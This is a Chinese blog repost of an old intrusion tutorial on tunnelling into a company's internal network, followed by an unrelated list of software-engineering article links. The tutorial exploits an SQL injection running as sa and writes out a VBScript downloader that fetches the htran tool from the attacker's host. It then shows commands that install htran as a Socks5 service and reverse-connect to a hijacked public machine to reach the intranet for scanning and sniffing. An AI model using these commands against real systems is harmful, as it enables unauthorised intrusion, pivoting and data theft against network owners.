博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
妙用代理渗透内网
阅读量:2434 次
发布时间:2019-05-10

本文共 1108 字,大约阅读时间需要 3 分钟。

文章作者:LiNzi [BCT&混客联盟]()
信息来源:邪恶八进制信息安全团队
正文
代理在入侵里的作用-----妙用代理,渗透内网
一、踩点
主机:
OS:Windows 2000 + IIS 5.0 + MSSQL
端口:80 21
数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.
首页存在注入漏洞,sa登陆.
注入点:
二、入侵思路
  1.给内网目标机装个代理服务器
  2.把弄好的那个代理端口映到公网.
  3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。
  4.接下来就是找共享,嗅探,社会工程学等等了。
三、入侵准备
  1.公网肉鸡一只:218.3.1.1
  2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。
  3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)
  4.A:192.168.1.2   B:218.3.1.1 C: D:192.168.0.25
四、入侵进行时
  1.工具上传:
在nbsi下执行:
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(Wscript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(Wscript.Arguments(1)),2 >down.vbs
然后下载工具:
cscript down.vbs htran.exe //到我的空间下载htran.exe
  2.安装Socks5服务
在nbsi下执行:
htran.exe -install   //安装Socks5服务
htran.exe -start   //启动Socks5服务
  3.反弹进行时
在B上运行:   htran.exe -s -listen 520 5200   //监听端口
在nbsi下执行:htran.exe -s -connect 218.3.1.1 520
  3.进入内网
现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。
五、渗透内网
  接下来就可以扫描,嗅探,等等,也就是后话了。
六、总结
  文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。
偶的朋友可以在我的QQ硬盘里面下载动画。在我的个人文章里面。

转载地址:http://zwmmb.baihongyu.com/

你可能感兴趣的文章
EDS用Borland作为它的全球标准
查看>>
CMMI模型与Rational软件相结合
查看>>
集成 IBM Rational RequisitePro 与 IBM Rational Portfolio Manager
查看>>
OOAD利器Rational Rose的介绍
查看>>
SCA客户端以及基于Java的模型实现(一)
查看>>
后CMMI时代的软件过程改进
查看>>
SCA及未来软件系统的开发
查看>>
CaliberRM 需求管理系统
查看>>
需求管理工具试用 – CaliberRM
查看>>
一年的测试生活和感悟
查看>>
黑盒测试
查看>>
没有需求就没有软件——需求工程简论
查看>>
使用PHP开发SCA和SDO
查看>>
通过RUP用例进行需求管理的可追踪性策略(2)
查看>>
持续改进之配置管理变更的关键路径
查看>>
SCA客户端以及基于Java的模型实现(四)
查看>>
Rational Rose和UML可视化建模基础
查看>>
Tuscany SCA 引导及装配过程
查看>>
linux 主机mail 系统配置.
查看>>
matplotlib 画图直接写入excel
查看>>